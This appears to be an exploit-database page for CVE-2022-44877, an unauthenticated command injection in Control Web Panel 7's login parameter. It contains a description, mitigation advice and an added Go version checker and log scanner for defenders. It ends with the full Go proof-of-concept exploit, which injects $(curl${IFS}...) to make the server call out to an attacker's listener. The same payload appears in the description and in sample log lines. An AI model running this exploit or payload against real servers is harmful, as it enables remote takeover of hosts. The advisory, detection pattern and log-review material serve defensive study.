Vendor: Control Web Panel (CWP)
Author: Mayank Deshmukh
Severity: CRITICAL (CVSS 9.8)
Vulnerability Class: Remote Code Execution (RCE)
CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command, i.e. OS command injection)
Product Name: Control Web Panel (CWP)
Affected Versions: CWP 7 before 0.9.8.1147
Patch Exists: YES
CVE: CVE-2022-44877
CPE: a:control_web_panel:control_web_panel:0.9.8.1147
Tags: packetstorm,cve,cve2022,centos,rce,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.title:"Login | Control WebPanel"', 'verified': True, 'vendor': 'control-webpanel', 'product': 'webpanel'}
Platforms Tested: Kali Linux
Published: 2023

Control Web Panel 7 (CWP7) v0.9.8.1147 – Remote Code Execution (RCE)

This exploit achieves unauthenticated remote code execution on Control Web Panel (CWP) 7 before version 0.9.8.1147 (CVE-2022-44877, CWE-78). The value of the login query parameter sent to /login/index.php is placed, without sanitization, into a shell command that the panel runs while handling a failed login attempt. Bash command substitution in that parameter, for example login=$(curl${IFS}ATTACKER:PORT), therefore runs attacker-chosen commands on the server; ${IFS} stands in for a space so the payload contains none and survives the URL without encoding. No credentials are required (CVSS PR:N): the PoC deliberately submits a wrong password to reach the vulnerable code path and confirms execution through an out-of-band callback to a listener the attacker controls. A successful run gives the attacker command execution with the privileges of the panel process, which can lead to unauthorized access, data leakage, and full compromise of the host.

Mitigation:

Update CWP to a release that contains the vendor fix for CVE-2022-44877 (the affected range is CWP 7 before 0.9.8.1147). Because the flaw is reachable without authentication and is listed in CISA's Known Exploited Vulnerabilities catalog (the kev tag above), restrict network access to the panel's login port (2030 in the exploit's usage example) to trusted addresses until the update is applied, and review the web server's access logs for requests to /login/index.php whose login parameter contains shell metacharacters such as $(, backticks, ${IFS}, ; or |; a hit on a host that was unpatched at the time should be treated as a likely compromise, not merely a scan. For the code itself, the correct fix is not generic "input validation" but never passing request data into a shell: log the failed login through a file-write API, or, if a command must be run, pass the value as a separate argument (escapeshellarg in PHP) rather than interpolating it into a command string.
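The two practical checks a defender needs for this advisory are version triage (is this CWP build in the affected range?) and log review for the injection pattern described above. The Go program below is an added example written for this page, not part of the original PoC or of CWP; it uses the version boundary from the exploit header (affected: versions before 0.9.8.1147), and the access-log lines it scans are constructed here in Apache/nginx combined format, with the attacker address 10.0.0.9 and the CWP path /login/index.php from the PoC. The query string is split by hand rather than with url.ParseQuery so that a payload containing ';' (which ParseQuery rejects) cannot slip past the scanner.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strconv"
	"strings"
)

// firstFixed is the first CWP build outside the affected range, taken from the
// exploit header (affected: versions < 0.9.8.1147). Assumption: CWP reports
// its version as dotted decimal.
var firstFixed = []int{0, 9, 8, 1147}

// parseVersion turns "0.9.8.1146" into []int{0, 9, 8, 1146}.
func parseVersion(v string) ([]int, error) {
	parts := strings.Split(strings.TrimSpace(v), ".")
	out := make([]int, 0, len(parts))
	for _, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return nil, fmt.Errorf("bad version component %q in %q", p, v)
		}
		out = append(out, n)
	}
	return out, nil
}

// IsVulnerableVersion reports whether a CWP version string sorts before the
// first fixed build. Missing trailing components are treated as zero.
func IsVulnerableVersion(v string) (bool, error) {
	got, err := parseVersion(v)
	if err != nil {
		return false, err
	}
	for i, want := range firstFixed {
		g := 0
		if i < len(got) {
			g = got[i]
		}
		if g != want {
			return g < want, nil
		}
	}
	return false, nil // equal to (or a sub-release of) the fixed build
}

// shellMeta matches what an attacker needs to break out of the shell command
// CWP builds from the login parameter: $(...) substitution, ${IFS}-style
// expansion, backticks, and command separators.
var shellMeta = regexp.MustCompile(`\$\(|\$\{|[;|&]|` + "`")

// requestTarget pulls the request target out of a combined-format log line.
var requestTarget = regexp.MustCompile(`"(?:GET|POST|PUT|HEAD) ([^ "]+) HTTP/`)

// loginParam returns the percent-decoded value of the login query parameter.
func loginParam(rawQuery string) (string, bool) {
	for _, kv := range strings.Split(rawQuery, "&") {
		k, v, _ := strings.Cut(kv, "=")
		if k != "login" {
			continue
		}
		if dec, err := url.QueryUnescape(v); err == nil {
			return dec, true
		}
		return v, true // malformed escape: inspect the raw value instead
	}
	return "", false
}

// FlagLoginInjection returns true, plus the decoded login value, when the line
// is a request to /login/index.php whose login parameter contains shell
// metacharacters. A benign login still returns its value with hit == false.
func FlagLoginInjection(line string) (bool, string) {
	m := requestTarget.FindStringSubmatch(line)
	if m == nil {
		return false, ""
	}
	path, rawQuery, _ := strings.Cut(m[1], "?")
	if path != "/login/index.php" {
		return false, ""
	}
	login, ok := loginParam(rawQuery)
	if !ok {
		return false, ""
	}
	return shellMeta.MatchString(login), login
}

// ScanLog returns the decoded payload of every flagged line.
func ScanLog(lines []string) []string {
	var hits []string
	for _, l := range lines {
		if hit, payload := FlagLoginInjection(l); hit {
			hits = append(hits, payload)
		}
	}
	return hits
}

// sampleLog is constructed for this example: the PoC request as a Go client
// sends it (raw), the same request percent-encoded, a normal login, and an
// unrelated request.
var sampleLog = []string{
	`10.0.0.9 - - [02/Feb/2023:10:14:03 +0000] "POST /login/index.php?login=$(curl${IFS}10.0.0.9:8020) HTTP/1.1" 200 512 "-" "Go-http-client/1.1"`,
	`10.0.0.9 - - [02/Feb/2023:10:14:05 +0000] "POST /login/index.php?login=%24%28curl%24%7BIFS%7D10.0.0.9%3A8020%29 HTTP/1.1" 200 512 "-" "curl/7.88.1"`,
	`192.168.1.20 - - [02/Feb/2023:10:15:11 +0000] "POST /login/index.php?login=admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"`,
	`192.168.1.21 - - [02/Feb/2023:10:15:12 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"`,
}

func main() {
	for _, v := range []string{"0.9.8.1146", "0.9.8.1147", "0.9.8.1148"} {
		vuln, _ := IsVulnerableVersion(v)
		fmt.Printf("CWP %s vulnerable: %v\n", v, vuln)
	}
	for _, p := range ScanLog(sampleLog) {
		fmt.Printf("injection attempt: login=%q\n", p)
	}
}
```

Both encoded and raw forms of the PoC decode to the same payload, so the scanner reports two hits for the sample and nothing for the ordinary login; when run against real logs, replace sampleLog with lines read from the server's access log and feed the output to your incident process rather than treating it as a scan statistic.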

Exploit-DB raw data:

// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7

// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020

package main

import (
    "bytes"
    "crypto/tls"
    "flag"
    "fmt"
    "net/http"
    "os"
    "time"
)

func main() {
    var host, call string
    flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
    flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
    flag.Parse()

    if host == "" || call == "" {
        flag.Usage()
        os.Exit(1)
    }

    banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)

`
    fmt.Print(banner)
    fmt.Println("[*] Triggering cURL command")
    fmt.Println("[*] Open Listener on " + call)

    // CWP normally serves the panel with a self-signed certificate,
    // so skip certificate validation.
    tr := &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    }
    client := &http.Client{Transport: tr}

    // Request URL. The login query parameter is embedded unsanitized in a
    // shell command on the server, so $(...) command substitution runs curl.
    // ${IFS} stands in for a space so the payload contains none.
    url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"

    // Request body. Any failed login reaches the vulnerable code path,
    // so the password is deliberately wrong.
    body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))

    // Build and send the POST request
    req, err := http.NewRequest("POST", url, body)
    if err != nil {
        fmt.Println("Error building request:", err)
        return
    }
    req.Header.Add("Content-Type", "application/x-www-form-urlencoded")

    resp, err := client.Do(req)
    if err != nil {
        fmt.Println("Error sending request:", err)
        return
    }
    resp.Body.Close()

    // Give the injected curl a moment to reach the listener
    time.Sleep(2 * time.Second)
    fmt.Println("\n[*] Check Listener for OOB callback")
}